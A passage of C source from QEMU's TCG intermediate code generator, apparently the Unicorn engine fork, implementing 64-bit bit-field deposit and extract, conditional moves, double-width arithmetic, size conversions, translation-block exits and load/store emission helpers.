tcg_debug_assert(len > 0); tcg_debug_assert(len <= 64); tcg_debug_assert(ofs + len <= 64); if (len == 64) { tcg_gen_mov_i64(tcg_ctx, ret, arg2); return; } #if TCG_TARGET_HAS_deposit_i64 if (TCG_TARGET_deposit_i64_valid(ofs, len)) { tcg_gen_op5ii_i64(tcg_ctx, INDEX_op_deposit_i64, ret, arg1, arg2, ofs, len); return; } #endif #if TCG_TARGET_REG_BITS == 32 if (ofs >= 32) { tcg_gen_deposit_i32(tcg_ctx, TCGV_HIGH(tcg_ctx, ret), TCGV_HIGH(tcg_ctx, arg1), TCGV_LOW(tcg_ctx, arg2), ofs - 32, len); tcg_gen_mov_i32(tcg_ctx, TCGV_LOW(tcg_ctx, ret), TCGV_LOW(tcg_ctx, arg1)); return; } if (ofs + len <= 32) { tcg_gen_deposit_i32(tcg_ctx, TCGV_LOW(tcg_ctx, ret), TCGV_LOW(tcg_ctx, arg1), TCGV_LOW(tcg_ctx, arg2), ofs, len); tcg_gen_mov_i32(tcg_ctx, TCGV_HIGH(tcg_ctx, ret), TCGV_HIGH(tcg_ctx, arg1)); return; } #endif t1 = tcg_temp_new_i64(tcg_ctx); #if TCG_TARGET_HAS_extract2_i64 if (ofs + len == 64) { tcg_gen_shli_i64(tcg_ctx, t1, arg1, len); tcg_gen_extract2_i64(tcg_ctx, ret, t1, arg2, len); goto done; } if (ofs == 0) { tcg_gen_extract2_i64(tcg_ctx, ret, arg1, arg2, len); tcg_gen_rotli_i64(tcg_ctx, ret, ret, len); goto done; } #endif mask = (1ull << len) - 1; if (ofs + len < 64) { tcg_gen_andi_i64(tcg_ctx, t1, arg2, mask); tcg_gen_shli_i64(tcg_ctx, t1, t1, ofs); } else { tcg_gen_shli_i64(tcg_ctx, t1, arg2, ofs); } tcg_gen_andi_i64(tcg_ctx, ret, arg1, ~(mask << ofs)); tcg_gen_or_i64(tcg_ctx, ret, ret, t1); #if TCG_TARGET_HAS_extract2_i64 done: #endif tcg_temp_free_i64(tcg_ctx, t1); } void tcg_gen_deposit_z_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_i64 arg, unsigned int ofs, unsigned int len) { tcg_debug_assert(ofs < 64); tcg_debug_assert(len > 0); tcg_debug_assert(len <= 64); tcg_debug_assert(ofs + len <= 64); if (ofs + len == 64) { tcg_gen_shli_i64(tcg_ctx, ret, arg, ofs); } else if (ofs == 0) { tcg_gen_andi_i64(tcg_ctx, ret, arg, (1ull << len) - 1); #if TCG_TARGET_HAS_deposit_i64 } else if (TCG_TARGET_deposit_i64_valid(ofs, len)) { TCGv_i64 zero = tcg_const_i64(tcg_ctx, 0); tcg_gen_op5ii_i64(tcg_ctx, INDEX_op_deposit_i64, ret, zero, arg, ofs, len); tcg_temp_free_i64(tcg_ctx, zero); #endif } else { #if TCG_TARGET_REG_BITS == 32 if (ofs >= 32) { tcg_gen_deposit_z_i32(tcg_ctx, TCGV_HIGH(tcg_ctx, ret), TCGV_LOW(tcg_ctx, arg), ofs - 32, len); tcg_gen_movi_i32(tcg_ctx, TCGV_LOW(tcg_ctx, ret), 0); return; } if (ofs + len <= 32) { tcg_gen_deposit_z_i32(tcg_ctx, TCGV_LOW(tcg_ctx, ret), TCGV_LOW(tcg_ctx, arg), ofs, len); tcg_gen_movi_i32(tcg_ctx, TCGV_HIGH(tcg_ctx, ret), 0); return; } #endif /* To help two-operand hosts we prefer to zero-extend first, which allows ARG to stay live. */ switch (len) { case 32: #if TCG_TARGET_HAS_ext32u_i64 tcg_gen_ext32u_i64(tcg_ctx, ret, arg); tcg_gen_shli_i64(tcg_ctx, ret, ret, ofs); return; #endif break; case 16: #if TCG_TARGET_HAS_ext16u_i64 tcg_gen_ext16u_i64(tcg_ctx, ret, arg); tcg_gen_shli_i64(tcg_ctx, ret, ret, ofs); return; #endif break; case 8: #if TCG_TARGET_HAS_ext8u_i64 tcg_gen_ext8u_i64(tcg_ctx, ret, arg); tcg_gen_shli_i64(tcg_ctx, ret, ret, ofs); return; #endif break; } /* Otherwise prefer zero-extension over AND for code size. */ switch (ofs + len) { case 32: #if TCG_TARGET_HAS_ext32u_i64 tcg_gen_shli_i64(tcg_ctx, ret, arg, ofs); tcg_gen_ext32u_i64(tcg_ctx, ret, ret); return; #endif break; case 16: #if TCG_TARGET_HAS_ext16u_i64 tcg_gen_shli_i64(tcg_ctx, ret, arg, ofs); tcg_gen_ext16u_i64(tcg_ctx, ret, ret); return; #endif break; case 8: #if TCG_TARGET_HAS_ext8u_i64 tcg_gen_shli_i64(tcg_ctx, ret, arg, ofs); tcg_gen_ext8u_i64(tcg_ctx, ret, ret); return; #endif break; } tcg_gen_andi_i64(tcg_ctx, ret, arg, (1ull << len) - 1); tcg_gen_shli_i64(tcg_ctx, ret, ret, ofs); } } void tcg_gen_extract_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_i64 arg, unsigned int ofs, unsigned int len) { tcg_debug_assert(ofs < 64); tcg_debug_assert(len > 0); tcg_debug_assert(len <= 64); tcg_debug_assert(ofs + len <= 64); /* Canonicalize certain special cases, even if extract is supported. */ if (ofs + len == 64) { tcg_gen_shri_i64(tcg_ctx, ret, arg, 64 - len); return; } if (ofs == 0) { tcg_gen_andi_i64(tcg_ctx, ret, arg, (1ull << len) - 1); return; } #if TCG_TARGET_REG_BITS == 32 /* Look for a 32-bit extract within one of the two words. */ if (ofs >= 32) { tcg_gen_extract_i32(tcg_ctx, TCGV_LOW(tcg_ctx, ret), TCGV_HIGH(tcg_ctx, arg), ofs - 32, len); tcg_gen_movi_i32(tcg_ctx, TCGV_HIGH(tcg_ctx, ret), 0); return; } if (ofs + len <= 32) { tcg_gen_extract_i32(tcg_ctx, TCGV_LOW(tcg_ctx, ret), TCGV_LOW(tcg_ctx, arg), ofs, len); tcg_gen_movi_i32(tcg_ctx, TCGV_HIGH(tcg_ctx, ret), 0); return; } /* The field is split across two words. One double-word shift is better than two double-word shifts. */ goto do_shift_and; #endif #if TCG_TARGET_HAS_extract_i64 if (TCG_TARGET_extract_i64_valid(ofs, len)) { tcg_gen_op4ii_i64(tcg_ctx, INDEX_op_extract_i64, ret, arg, ofs, len); return; } #endif /* Assume that zero-extension, if available, is cheaper than a shift. */ switch (ofs + len) { case 32: #if TCG_TARGET_HAS_ext32u_i64 tcg_gen_ext32u_i64(tcg_ctx, ret, arg); tcg_gen_shri_i64(tcg_ctx, ret, ret, ofs); return; #endif break; case 16: #if TCG_TARGET_HAS_ext16u_i64 tcg_gen_ext16u_i64(tcg_ctx, ret, arg); tcg_gen_shri_i64(tcg_ctx, ret, ret, ofs); return; #endif break; case 8: #if TCG_TARGET_HAS_ext8u_i64 tcg_gen_ext8u_i64(tcg_ctx, ret, arg); tcg_gen_shri_i64(tcg_ctx, ret, ret, ofs); return; #endif break; } /* ??? Ideally we'd know what values are available for immediate AND. Assume that 8 bits are available, plus the special cases of 16 and 32, so that we get ext8u, ext16u, and ext32u. */ switch (len) { case 1: case 2: case 3: case 4: case 5: case 6: case 7: case 8: case 16: case 32: #if TCG_TARGET_REG_BITS == 32 do_shift_and: #endif tcg_gen_shri_i64(tcg_ctx, ret, arg, ofs); tcg_gen_andi_i64(tcg_ctx, ret, ret, (1ull << len) - 1); break; default: tcg_gen_shli_i64(tcg_ctx, ret, arg, 64 - len - ofs); tcg_gen_shri_i64(tcg_ctx, ret, ret, 64 - len); break; } } void tcg_gen_sextract_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_i64 arg, unsigned int ofs, unsigned int len) { tcg_debug_assert(ofs < 64); tcg_debug_assert(len > 0); tcg_debug_assert(len <= 64); tcg_debug_assert(ofs + len <= 64); /* Canonicalize certain special cases, even if sextract is supported. */ if (ofs + len == 64) { tcg_gen_sari_i64(tcg_ctx, ret, arg, 64 - len); return; } if (ofs == 0) { switch (len) { case 32: tcg_gen_ext32s_i64(tcg_ctx, ret, arg); return; case 16: tcg_gen_ext16s_i64(tcg_ctx, ret, arg); return; case 8: tcg_gen_ext8s_i64(tcg_ctx, ret, arg); return; } } #if TCG_TARGET_REG_BITS == 32 /* Look for a 32-bit extract within one of the two words. */ if (ofs >= 32) { tcg_gen_sextract_i32(tcg_ctx, TCGV_LOW(tcg_ctx, ret), TCGV_HIGH(tcg_ctx, arg), ofs - 32, len); } else if (ofs + len <= 32) { tcg_gen_sextract_i32(tcg_ctx, TCGV_LOW(tcg_ctx, ret), TCGV_LOW(tcg_ctx, arg), ofs, len); } else if (ofs == 0) { tcg_gen_mov_i32(tcg_ctx, TCGV_LOW(tcg_ctx, ret), TCGV_LOW(tcg_ctx, arg)); tcg_gen_sextract_i32(tcg_ctx, TCGV_HIGH(tcg_ctx, ret), TCGV_HIGH(tcg_ctx, arg), 0, len - 32); return; } else if (len > 32) { TCGv_i32 t = tcg_temp_new_i32(tcg_ctx); /* Extract the bits for the high word normally. */ tcg_gen_sextract_i32(tcg_ctx, t, TCGV_HIGH(tcg_ctx, arg), ofs + 32, len - 32); /* Shift the field down for the low part. */ tcg_gen_shri_i64(tcg_ctx, ret, arg, ofs); /* Overwrite the shift into the high part. */ tcg_gen_mov_i32(tcg_ctx, TCGV_HIGH(tcg_ctx, ret), t); tcg_temp_free_i32(tcg_ctx, t); return; } else { /* Shift the field down for the low part, such that the field sits at the MSB. */ tcg_gen_shri_i64(tcg_ctx, ret, arg, ofs + len - 32); /* Shift the field down from the MSB, sign extending. */ tcg_gen_sari_i32(tcg_ctx, TCGV_LOW(tcg_ctx, ret), TCGV_LOW(tcg_ctx, ret), 32 - len); } /* Sign-extend the field from 32 bits. */ tcg_gen_sari_i32(tcg_ctx, TCGV_HIGH(tcg_ctx, ret), TCGV_LOW(tcg_ctx, ret), 31); return; #endif #if TCG_TARGET_HAS_sextract_i64 if (TCG_TARGET_extract_i64_valid(ofs, len)) { tcg_gen_op4ii_i64(tcg_ctx, INDEX_op_sextract_i64, ret, arg, ofs, len); return; } #endif /* Assume that sign-extension, if available, is cheaper than a shift. */ switch (ofs + len) { case 32: #if TCG_TARGET_HAS_ext32s_i64 tcg_gen_ext32s_i64(tcg_ctx, ret, arg); tcg_gen_sari_i64(tcg_ctx, ret, ret, ofs); return; #endif break; case 16: #if TCG_TARGET_HAS_ext16s_i64 tcg_gen_ext16s_i64(tcg_ctx, ret, arg); tcg_gen_sari_i64(tcg_ctx, ret, ret, ofs); return; #endif break; case 8: #if TCG_TARGET_HAS_ext8s_i64 tcg_gen_ext8s_i64(tcg_ctx, ret, arg); tcg_gen_sari_i64(tcg_ctx, ret, ret, ofs); return; #endif break; } switch (len) { case 32: #if TCG_TARGET_HAS_ext32s_i64 tcg_gen_shri_i64(tcg_ctx, ret, arg, ofs); tcg_gen_ext32s_i64(tcg_ctx, ret, ret); return; #endif break; case 16: #if TCG_TARGET_HAS_ext16s_i64 tcg_gen_shri_i64(tcg_ctx, ret, arg, ofs); tcg_gen_ext16s_i64(tcg_ctx, ret, ret); return; #endif break; case 8: #if TCG_TARGET_HAS_ext8s_i64 tcg_gen_shri_i64(tcg_ctx, ret, arg, ofs); tcg_gen_ext8s_i64(tcg_ctx, ret, ret); return; #endif break; } tcg_gen_shli_i64(tcg_ctx, ret, arg, 64 - len - ofs); tcg_gen_sari_i64(tcg_ctx, ret, ret, 64 - len); } /* * Extract 64 bits from a 128-bit input, ah:al, starting from ofs. * Unlike tcg_gen_extract_i64 above, len is fixed at 64. */ void tcg_gen_extract2_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_i64 al, TCGv_i64 ah, unsigned int ofs) { tcg_debug_assert(ofs <= 64); if (ofs == 0) { tcg_gen_mov_i64(tcg_ctx, ret, al); } else if (ofs == 64) { tcg_gen_mov_i64(tcg_ctx, ret, ah); } else if (al == ah) { tcg_gen_rotri_i64(tcg_ctx, ret, al, ofs); } else { #if TCG_TARGET_HAS_extract2_i64 tcg_gen_op4i_i64(tcg_ctx, INDEX_op_extract2_i64, ret, al, ah, ofs); #else TCGv_i64 t0 = tcg_temp_new_i64(tcg_ctx); tcg_gen_shri_i64(tcg_ctx, t0, al, ofs); tcg_gen_deposit_i64(tcg_ctx, ret, t0, ah, 64 - ofs, ofs); tcg_temp_free_i64(tcg_ctx, t0); #endif } } void tcg_gen_movcond_i64(TCGContext *tcg_ctx, TCGCond cond, TCGv_i64 ret, TCGv_i64 c1, TCGv_i64 c2, TCGv_i64 v1, TCGv_i64 v2) { if (cond == TCG_COND_ALWAYS) { tcg_gen_mov_i64(tcg_ctx, ret, v1); } else if (cond == TCG_COND_NEVER) { tcg_gen_mov_i64(tcg_ctx, ret, v2); } else { #if TCG_TARGET_REG_BITS == 32 TCGv_i32 t0 = tcg_temp_new_i32(tcg_ctx); TCGv_i32 t1 = tcg_temp_new_i32(tcg_ctx); tcg_gen_op6i_i32(tcg_ctx, INDEX_op_setcond2_i32, t0, TCGV_LOW(tcg_ctx, c1), TCGV_HIGH(tcg_ctx, c1), TCGV_LOW(tcg_ctx, c2), TCGV_HIGH(tcg_ctx, c2), cond); #if TCG_TARGET_HAS_movcond_i32 tcg_gen_movi_i32(tcg_ctx, t1, 0); tcg_gen_movcond_i32(tcg_ctx, TCG_COND_NE, TCGV_LOW(tcg_ctx, ret), t0, t1, TCGV_LOW(tcg_ctx, v1), TCGV_LOW(tcg_ctx, v2)); tcg_gen_movcond_i32(tcg_ctx, TCG_COND_NE, TCGV_HIGH(tcg_ctx, ret), t0, t1, TCGV_HIGH(tcg_ctx, v1), TCGV_HIGH(tcg_ctx, v2)); #else tcg_gen_neg_i32(tcg_ctx, t0, t0); tcg_gen_and_i32(tcg_ctx, t1, TCGV_LOW(tcg_ctx, v1), t0); tcg_gen_andc_i32(tcg_ctx, TCGV_LOW(tcg_ctx, ret), TCGV_LOW(tcg_ctx, v2), t0); tcg_gen_or_i32(tcg_ctx, TCGV_LOW(tcg_ctx, ret), TCGV_LOW(tcg_ctx, ret), t1); tcg_gen_and_i32(tcg_ctx, t1, TCGV_HIGH(tcg_ctx, v1), t0); tcg_gen_andc_i32(tcg_ctx, TCGV_HIGH(tcg_ctx, ret), TCGV_HIGH(tcg_ctx, v2), t0); tcg_gen_or_i32(tcg_ctx, TCGV_HIGH(tcg_ctx, ret), TCGV_HIGH(tcg_ctx, ret), t1); #endif tcg_temp_free_i32(tcg_ctx, t0); tcg_temp_free_i32(tcg_ctx, t1); #elif TCG_TARGET_HAS_movcond_i64 tcg_gen_op6i_i64(tcg_ctx, INDEX_op_movcond_i64, ret, c1, c2, v1, v2, cond); #else TCGv_i64 t0 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 t1 = tcg_temp_new_i64(tcg_ctx); tcg_gen_setcond_i64(tcg_ctx, cond, t0, c1, c2); tcg_gen_neg_i64(tcg_ctx, t0, t0); tcg_gen_and_i64(tcg_ctx, t1, v1, t0); tcg_gen_andc_i64(tcg_ctx, ret, v2, t0); tcg_gen_or_i64(tcg_ctx, ret, ret, t1); tcg_temp_free_i64(tcg_ctx, t0); tcg_temp_free_i64(tcg_ctx, t1); #endif } } void tcg_gen_add2_i64(TCGContext *tcg_ctx, TCGv_i64 rl, TCGv_i64 rh, TCGv_i64 al, TCGv_i64 ah, TCGv_i64 bl, TCGv_i64 bh) { #if TCG_TARGET_HAS_add2_i64 tcg_gen_op6_i64(tcg_ctx, INDEX_op_add2_i64, rl, rh, al, ah, bl, bh); #else TCGv_i64 t0 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 t1 = tcg_temp_new_i64(tcg_ctx); tcg_gen_add_i64(tcg_ctx, t0, al, bl); tcg_gen_setcond_i64(tcg_ctx, TCG_COND_LTU, t1, t0, al); tcg_gen_add_i64(tcg_ctx, rh, ah, bh); tcg_gen_add_i64(tcg_ctx, rh, rh, t1); tcg_gen_mov_i64(tcg_ctx, rl, t0); tcg_temp_free_i64(tcg_ctx, t0); tcg_temp_free_i64(tcg_ctx, t1); #endif } void tcg_gen_sub2_i64(TCGContext *tcg_ctx, TCGv_i64 rl, TCGv_i64 rh, TCGv_i64 al, TCGv_i64 ah, TCGv_i64 bl, TCGv_i64 bh) { #if TCG_TARGET_HAS_sub2_i64 tcg_gen_op6_i64(tcg_ctx, INDEX_op_sub2_i64, rl, rh, al, ah, bl, bh); #else TCGv_i64 t0 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 t1 = tcg_temp_new_i64(tcg_ctx); tcg_gen_sub_i64(tcg_ctx, t0, al, bl); tcg_gen_setcond_i64(tcg_ctx, TCG_COND_LTU, t1, al, bl); tcg_gen_sub_i64(tcg_ctx, rh, ah, bh); tcg_gen_sub_i64(tcg_ctx, rh, rh, t1); tcg_gen_mov_i64(tcg_ctx, rl, t0); tcg_temp_free_i64(tcg_ctx, t0); tcg_temp_free_i64(tcg_ctx, t1); #endif } void tcg_gen_mulu2_i64(TCGContext *tcg_ctx, TCGv_i64 rl, TCGv_i64 rh, TCGv_i64 arg1, TCGv_i64 arg2) { #if TCG_TARGET_HAS_mulu2_i64 tcg_gen_op4_i64(tcg_ctx, INDEX_op_mulu2_i64, rl, rh, arg1, arg2); #elif TCG_TARGET_HAS_muluh_i64 TCGv_i64 t = tcg_temp_new_i64(tcg_ctx); tcg_gen_op3_i64(tcg_ctx, INDEX_op_mul_i64, t, arg1, arg2); tcg_gen_op3_i64(tcg_ctx, INDEX_op_muluh_i64, rh, arg1, arg2); tcg_gen_mov_i64(tcg_ctx, rl, t); tcg_temp_free_i64(tcg_ctx, t); #else TCGv_i64 t0 = tcg_temp_new_i64(tcg_ctx); tcg_gen_mul_i64(tcg_ctx, t0, arg1, arg2); gen_helper_muluh_i64(tcg_ctx, rh, arg1, arg2); tcg_gen_mov_i64(tcg_ctx, rl, t0); tcg_temp_free_i64(tcg_ctx, t0); #endif } void tcg_gen_muls2_i64(TCGContext *tcg_ctx, TCGv_i64 rl, TCGv_i64 rh, TCGv_i64 arg1, TCGv_i64 arg2) { #if TCG_TARGET_HAS_muls2_i64 tcg_gen_op4_i64(tcg_ctx, INDEX_op_muls2_i64, rl, rh, arg1, arg2); #elif TCG_TARGET_HAS_mulsh_i64 TCGv_i64 t = tcg_temp_new_i64(tcg_ctx); tcg_gen_op3_i64(tcg_ctx, INDEX_op_mul_i64, t, arg1, arg2); tcg_gen_op3_i64(tcg_ctx, INDEX_op_mulsh_i64, rh, arg1, arg2); tcg_gen_mov_i64(tcg_ctx, rl, t); tcg_temp_free_i64(tcg_ctx, t); #elif TCG_TARGET_HAS_mulu2_i64 || TCG_TARGET_HAS_muluh_i64 TCGv_i64 t0 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 t1 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 t2 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 t3 = tcg_temp_new_i64(tcg_ctx); tcg_gen_mulu2_i64(tcg_ctx, t0, t1, arg1, arg2); /* Adjust for negative inputs. */ tcg_gen_sari_i64(tcg_ctx, t2, arg1, 63); tcg_gen_sari_i64(tcg_ctx, t3, arg2, 63); tcg_gen_and_i64(tcg_ctx, t2, t2, arg2); tcg_gen_and_i64(tcg_ctx, t3, t3, arg1); tcg_gen_sub_i64(tcg_ctx, rh, t1, t2); tcg_gen_sub_i64(tcg_ctx, rh, rh, t3); tcg_gen_mov_i64(tcg_ctx, rl, t0); tcg_temp_free_i64(tcg_ctx, t0); tcg_temp_free_i64(tcg_ctx, t1); tcg_temp_free_i64(tcg_ctx, t2); tcg_temp_free_i64(tcg_ctx, t3); #else TCGv_i64 t0 = tcg_temp_new_i64(tcg_ctx); tcg_gen_mul_i64(tcg_ctx, t0, arg1, arg2); gen_helper_mulsh_i64(tcg_ctx, rh, arg1, arg2); tcg_gen_mov_i64(tcg_ctx, rl, t0); tcg_temp_free_i64(tcg_ctx, t0); #endif } void tcg_gen_mulsu2_i64(TCGContext *tcg_ctx, TCGv_i64 rl, TCGv_i64 rh, TCGv_i64 arg1, TCGv_i64 arg2) { TCGv_i64 t0 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 t1 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 t2 = tcg_temp_new_i64(tcg_ctx); tcg_gen_mulu2_i64(tcg_ctx, t0, t1, arg1, arg2); /* Adjust for negative input for the signed arg1. */ tcg_gen_sari_i64(tcg_ctx, t2, arg1, 63); tcg_gen_and_i64(tcg_ctx, t2, t2, arg2); tcg_gen_sub_i64(tcg_ctx, rh, t1, t2); tcg_gen_mov_i64(tcg_ctx, rl, t0); tcg_temp_free_i64(tcg_ctx, t0); tcg_temp_free_i64(tcg_ctx, t1); tcg_temp_free_i64(tcg_ctx, t2); } void tcg_gen_smin_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_i64 a, TCGv_i64 b) { tcg_gen_movcond_i64(tcg_ctx, TCG_COND_LT, ret, a, b, a, b); } void tcg_gen_umin_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_i64 a, TCGv_i64 b) { tcg_gen_movcond_i64(tcg_ctx, TCG_COND_LTU, ret, a, b, a, b); } void tcg_gen_smax_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_i64 a, TCGv_i64 b) { tcg_gen_movcond_i64(tcg_ctx, TCG_COND_LT, ret, a, b, b, a); } void tcg_gen_umax_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_i64 a, TCGv_i64 b) { tcg_gen_movcond_i64(tcg_ctx, TCG_COND_LTU, ret, a, b, b, a); } void tcg_gen_abs_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_i64 a) { TCGv_i64 t = tcg_temp_new_i64(tcg_ctx); tcg_gen_sari_i64(tcg_ctx, t, a, 63); tcg_gen_xor_i64(tcg_ctx, ret, a, t); tcg_gen_sub_i64(tcg_ctx, ret, ret, t); tcg_temp_free_i64(tcg_ctx, t); } /* Size changing operations. */ void tcg_gen_extrl_i64_i32(TCGContext *tcg_ctx, TCGv_i32 ret, TCGv_i64 arg) { #if TCG_TARGET_REG_BITS == 32 tcg_gen_mov_i32(tcg_ctx, ret, TCGV_LOW(tcg_ctx, arg)); #elif TCG_TARGET_HAS_extrl_i64_i32 tcg_gen_op2(tcg_ctx, INDEX_op_extrl_i64_i32, tcgv_i32_arg(tcg_ctx, ret), tcgv_i64_arg(tcg_ctx, arg)); #else tcg_gen_mov_i32(tcg_ctx, ret, (TCGv_i32)arg); #endif } void tcg_gen_extrh_i64_i32(TCGContext *tcg_ctx, TCGv_i32 ret, TCGv_i64 arg) { #if TCG_TARGET_REG_BITS == 32 tcg_gen_mov_i32(tcg_ctx, ret, TCGV_HIGH(tcg_ctx, arg)); #elif TCG_TARGET_HAS_extrh_i64_i32 tcg_gen_op2(tcg_ctx, INDEX_op_extrh_i64_i32, tcgv_i32_arg(tcg_ctx, ret), tcgv_i64_arg(tcg_ctx, arg)); #else TCGv_i64 t = tcg_temp_new_i64(tcg_ctx); tcg_gen_shri_i64(tcg_ctx, t, arg, 32); tcg_gen_mov_i32(tcg_ctx, ret, (TCGv_i32)t); tcg_temp_free_i64(tcg_ctx, t); #endif } void tcg_gen_extu_i32_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_i32 arg) { #if TCG_TARGET_REG_BITS == 32 tcg_gen_mov_i32(tcg_ctx, TCGV_LOW(tcg_ctx, ret), arg); tcg_gen_movi_i32(tcg_ctx, TCGV_HIGH(tcg_ctx, ret), 0); #else tcg_gen_op2(tcg_ctx, INDEX_op_extu_i32_i64, tcgv_i64_arg(tcg_ctx, ret), tcgv_i32_arg(tcg_ctx, arg)); #endif } void tcg_gen_ext_i32_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_i32 arg) { #if TCG_TARGET_REG_BITS == 32 tcg_gen_mov_i32(tcg_ctx, TCGV_LOW(tcg_ctx, ret), arg); tcg_gen_sari_i32(tcg_ctx, TCGV_HIGH(tcg_ctx, ret), TCGV_LOW(tcg_ctx, ret), 31); #else tcg_gen_op2(tcg_ctx, INDEX_op_ext_i32_i64, tcgv_i64_arg(tcg_ctx, ret), tcgv_i32_arg(tcg_ctx, arg)); #endif } void tcg_gen_concat_i32_i64(TCGContext *tcg_ctx, TCGv_i64 dest, TCGv_i32 low, TCGv_i32 high) { #if TCG_TARGET_REG_BITS == 32 tcg_gen_mov_i32(tcg_ctx, TCGV_LOW(tcg_ctx, dest), low); tcg_gen_mov_i32(tcg_ctx, TCGV_HIGH(tcg_ctx, dest), high); return; #else TCGv_i64 tmp; tmp = tcg_temp_new_i64(tcg_ctx); /* These extensions are only needed for type correctness. We may be able to do better given target specific information. */ tcg_gen_extu_i32_i64(tcg_ctx, tmp, high); tcg_gen_extu_i32_i64(tcg_ctx, dest, low); /* If deposit is available, use it. Otherwise use the extra knowledge that we have of the zero-extensions above. */ #if TCG_TARGET_HAS_deposit_i64 if (TCG_TARGET_deposit_i64_valid(32, 32)) { tcg_gen_deposit_i64(tcg_ctx, dest, dest, tmp, 32, 32); } else { #endif tcg_gen_shli_i64(tcg_ctx, tmp, tmp, 32); tcg_gen_or_i64(tcg_ctx, dest, dest, tmp); #if TCG_TARGET_HAS_deposit_i64 } #endif tcg_temp_free_i64(tcg_ctx, tmp); #endif } void tcg_gen_extr_i64_i32(TCGContext *tcg_ctx, TCGv_i32 lo, TCGv_i32 hi, TCGv_i64 arg) { #if TCG_TARGET_REG_BITS == 32 tcg_gen_mov_i32(tcg_ctx, lo, TCGV_LOW(tcg_ctx, arg)); tcg_gen_mov_i32(tcg_ctx, hi, TCGV_HIGH(tcg_ctx, arg)); #else tcg_gen_extrl_i64_i32(tcg_ctx, lo, arg); tcg_gen_extrh_i64_i32(tcg_ctx, hi, arg); #endif } void tcg_gen_extr32_i64(TCGContext *tcg_ctx, TCGv_i64 lo, TCGv_i64 hi, TCGv_i64 arg) { tcg_gen_ext32u_i64(tcg_ctx, lo, arg); tcg_gen_shri_i64(tcg_ctx, hi, arg, 32); } /* QEMU specific operations. */ void tcg_gen_exit_tb(TCGContext *tcg_ctx, TranslationBlock *tb, unsigned idx) { uintptr_t val = (uintptr_t)tb + idx; if (tb == NULL) { tcg_debug_assert(idx == 0); } else if (idx <= TB_EXIT_IDXMAX) { #ifdef CONFIG_DEBUG_TCG /* This is an exit following a goto_tb. Verify that we have seen this numbered exit before, via tcg_gen_goto_tb. */ tcg_debug_assert(tcg_ctx->goto_tb_issue_mask & (1 << idx)); #endif /* When not chaining, exit without indicating a link. */ //if (qemu_loglevel_mask(CPU_LOG_TB_NOCHAIN)) { // val = 0; //} } else { /* This is an exit via the exitreq label. */ tcg_debug_assert(idx == TB_EXIT_REQUESTED); } tcg_gen_op1i(tcg_ctx, INDEX_op_exit_tb, val); } void tcg_gen_goto_tb(TCGContext *tcg_ctx, unsigned idx) { /* We only support two chained exits. */ tcg_debug_assert(idx <= TB_EXIT_IDXMAX); #ifdef CONFIG_DEBUG_TCG /* Verify that we havn't seen this numbered exit before. */ tcg_debug_assert((tcg_ctx->goto_tb_issue_mask & (1 << idx)) == 0); tcg_ctx->goto_tb_issue_mask |= 1 << idx; #endif /* When not chaining, we simply fall through to the "fallback" exit. */ // if (!qemu_loglevel_mask(CPU_LOG_TB_NOCHAIN)) tcg_gen_op1i(tcg_ctx, INDEX_op_goto_tb, idx); } void tcg_gen_lookup_and_goto_ptr(TCGContext *tcg_ctx) { #if TCG_TARGET_HAS_goto_ptr TCGv_ptr ptr; ptr = tcg_temp_new_ptr(tcg_ctx); gen_helper_lookup_tb_ptr(tcg_ctx, ptr, tcg_ctx->cpu_env); tcg_gen_op1i(tcg_ctx, INDEX_op_goto_ptr, tcgv_ptr_arg(tcg_ctx, ptr)); tcg_temp_free_ptr(tcg_ctx, ptr); #else tcg_gen_exit_tb(tcg_ctx, NULL, 0); #endif } static inline MemOp tcg_canonicalize_memop(MemOp op, bool is64, bool st) { /* Trigger the asserts within as early as possible. */ (void)get_alignment_bits(op); switch (op & MO_SIZE) { case MO_8: op &= ~MO_BSWAP; break; case MO_16: break; case MO_32: if (!is64) { op &= ~MO_SIGN; } break; case MO_64: if (!is64) { tcg_abort(); } break; } if (st) { op &= ~MO_SIGN; } return op; } static void gen_ldst_i32(TCGContext *tcg_ctx, TCGOpcode opc, TCGv_i32 val, TCGv addr, MemOp memop, TCGArg idx) { TCGMemOpIdx oi = make_memop_idx(memop, idx); #if TARGET_LONG_BITS == 32 tcg_gen_op3i_i32(tcg_ctx, opc, val, addr, oi); #else #if TCG_TARGET_REG_BITS == 32 tcg_gen_op4i_i32(tcg_ctx, opc, val, TCGV_LOW(tcg_ctx, addr), TCGV_HIGH(tcg_ctx, addr), oi); #else tcg_gen_op3(tcg_ctx, opc, tcgv_i32_arg(tcg_ctx, val), tcgv_i64_arg(tcg_ctx, addr), oi); #endif #endif } static void gen_ldst_i64(TCGContext *tcg_ctx, TCGOpcode opc, TCGv_i64 val, TCGv addr, MemOp memop, TCGArg idx) { TCGMemOpIdx oi = make_memop_idx(memop, idx); #if TARGET_LONG_BITS == 32 #if TCG_TARGET_REG_BITS == 32 tcg_gen_op4i_i32(tcg_ctx, opc, TCGV_LOW(tcg_ctx, val), TCGV_HIGH(tcg_ctx, val), addr, oi); #else tcg_gen_op3(tcg_ctx, opc, tcgv_i64_arg(tcg_ctx, val), tcgv_i32_arg(tcg_ctx, addr), oi); #endif #else #if TCG_TARGET_REG_BITS == 32 tcg_gen_op5i_i32(tcg_ctx, opc, TCGV_LOW(tcg_ctx, val), TCGV_HIGH(tcg_ctx, val), TCGV_LOW(tcg_ctx, addr), TCGV_HIGH(tcg_ctx, addr), oi); #else tcg_gen_op3i_i64(tcg_ctx, opc, val, addr, oi); #endif #endif } // Unicorn engine // check if the last memory access was invalid // if so, we jump to the block 